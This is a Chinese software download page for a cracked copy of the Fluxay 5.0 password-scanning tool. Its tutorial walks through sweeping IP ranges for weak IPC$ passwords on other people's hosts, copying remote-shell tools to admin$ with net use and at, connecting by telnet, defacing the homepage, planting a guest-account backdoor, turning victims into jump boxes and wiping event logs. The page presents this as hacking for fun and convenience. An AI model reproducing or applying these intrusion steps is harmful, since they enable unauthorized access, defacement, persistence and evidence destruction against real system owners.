流光Fluxay
星级

4.8

流光Fluxay

更新时间:2021-10-15 当前版本:V3.4.1 大小:8.51MB
软件类别:安全防护 软件平台:XP/Win7/Win10/Win8
立即下载 3人安装6人喜欢
应用介绍

软件全称流光Fluxay5.0,这是由小榕软件带来的是一款非常好用的ftp、pop3解密工具。软件功能实用,界面简洁。可以用来对POP3/FTP主机中用户密码安全漏洞进行扫描和检测。不仅如此,用户还可以通过其内置的字典工具、NT/IIS工具、MSSQL工具、模式文件设定、Fluxay Sensor工具来进行对远程的POP3主机、IMAP、FTP、http主机进行访问,这样就可以直接访问别人的主机了。小编带来的是流光5.0破解版,需要的朋友可来本站下载使用。

安装说明

1、用 百度网盘 下载好数据包,解压压缩包,双击“Setup_Fluxay5.exe”开始安装软件。
2、根据安装向导将软件安装完成即可。

使用教程

方法一:
步骤1:打开高级扫描向导设置扫描参数 
“文件”--}“高级扫描向导” 
--}在“起始”/“结束”位置填入,你要扫描的IP段。 
--}在“ 目标系统”中选择你要检测的操作系统。 
--}在“获取主机名”、“PING检查”前面打勾 
--}在“检测项目”中选择“全选” 
--}然后单击“下一步”选择“标准端口扫描” 
说明:“标准断口”只对常见的断口进行扫描。 
“自定义”可以自己定义进行扫描。 
--}然后单击“下一步” 设置好所有检测项目后点击“下一步” 
--}在选择主机界面选择“本地主机”使用本地主机进任务扫描。 
步骤2:单击“开始”扫描过程中要想停止选择“取消”不过要等一段时间。 
步骤3:查看扫描报告。扫描结束之后给出“HTLM”格式的报告
方法二:
一、POP3/FTP/…探测 
二、IPC探测 
三、SQL探测 
四、高级扫描 
五、其它 … 
因为开发时间的原因,上面的探测模式略有不同,所以分成了四个部分,本教程说的是第一个部分的探测。后面的探测模式应该属于软件的高级应用了:) 
流光的IPC探测: 
一、目的和任务: 
1、用流光的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/代理。 
2、学习IPC探测的相关知识。 
二、探测流程: 
1、你得有该软件,我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000,否则软件启动会失败! 
什么是IPC: 
IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。 
IPC$是Windows NT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。 
注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。 
可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 … 
2、首次启动,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得到弱口令)。 
在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。 
3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机 
4、探测中…… 
(注意如果你要探测的是软件保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样) 
有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办么? :)有的是 !自己看看工具-菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。 
黑了他 ! 
开个dos prompt 执行如下命令,本次用的例子如下图。 
1、 net use \对方ipipc$ "密码" /user:"用户名" || 建立远程连接 
2、 copy icmd.exe \对方ipadmin$ || admin$是对方的winnt目录 :) 这里文件多。 
3、 net time \对方IP || 看看对方的本地时间 
4、at \对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。 
5、 telnet 对方ip 端口 || 
6、输入pass (如果不是用icmd.exe,或者没有设置口令就不用了) || 
7、在开个窗口,继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe 
如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止,一般是在X:interpubwwwroot . 
假如首页文件是default.htm并且在c:interpubwwwroot,这样:copy default.htm \ipc$interpubwwwroot 
下面的图有演示 
8、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点: 
执行我们copy 过去的ntlm.exe ,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手copy的那堆东西 :) 
9、还能做成其他的么 ? 
当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,速度快、空间无限,嘿嘿 :) 
10、日志清除,断开连接 : 
执行我们copy 过去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use \ipipc$ /delete 

使用说明

1、快捷键:N/A
2、功能说明:关于netXeyes
3、软件5的版权说明。
4、快捷键Ctrl+F连接到软件论坛,有关软件的问题讨论。
5、快捷键N/A连接到netXeyes的WEB站点。
6、检查软件有无最新的版本可以升级。
7、以前各个版本的功能说明,可以作为本参考的补充。
8、系统广播,可以从这个地方获得有关软件最新消息。

软件功能

1、用于检测POP3/FTP主机中用户密码安全漏洞。
2、163/169双通。
3、多线程检测,消除系统中密码漏洞。
4、高效的用户流模式。
5、高效服务器流模式,可同时对多台POP3/FTP主机进行检测。
6、最多500个线程探测。
7、线程超时设置,阻塞线程具有自杀功能,不会影响其他线程。
8、支持10个字典同时检测。
9、检测设置可作为项目保存。

软件特色

1、提供高级扫描功能,支持fluxay5.0破解版分析漏洞
2、需要您设置主机的地址,可以利用虚拟地址测试
3、提示您可以设置IP范围以及端口类型
4、支持探测远程登录的ipc地址
5、分析的时候可以通过软件的设置功能建立环境
6、探测的时候会自动与对远程的服务器连接
7、支持高级扫描功能设置
8、支持对pop3、ftp等设备扫描
9、也可以对主机的类型以及锻炼口分析
10、取消了国内IP限制而且免费。

猜你喜欢
更多安全防护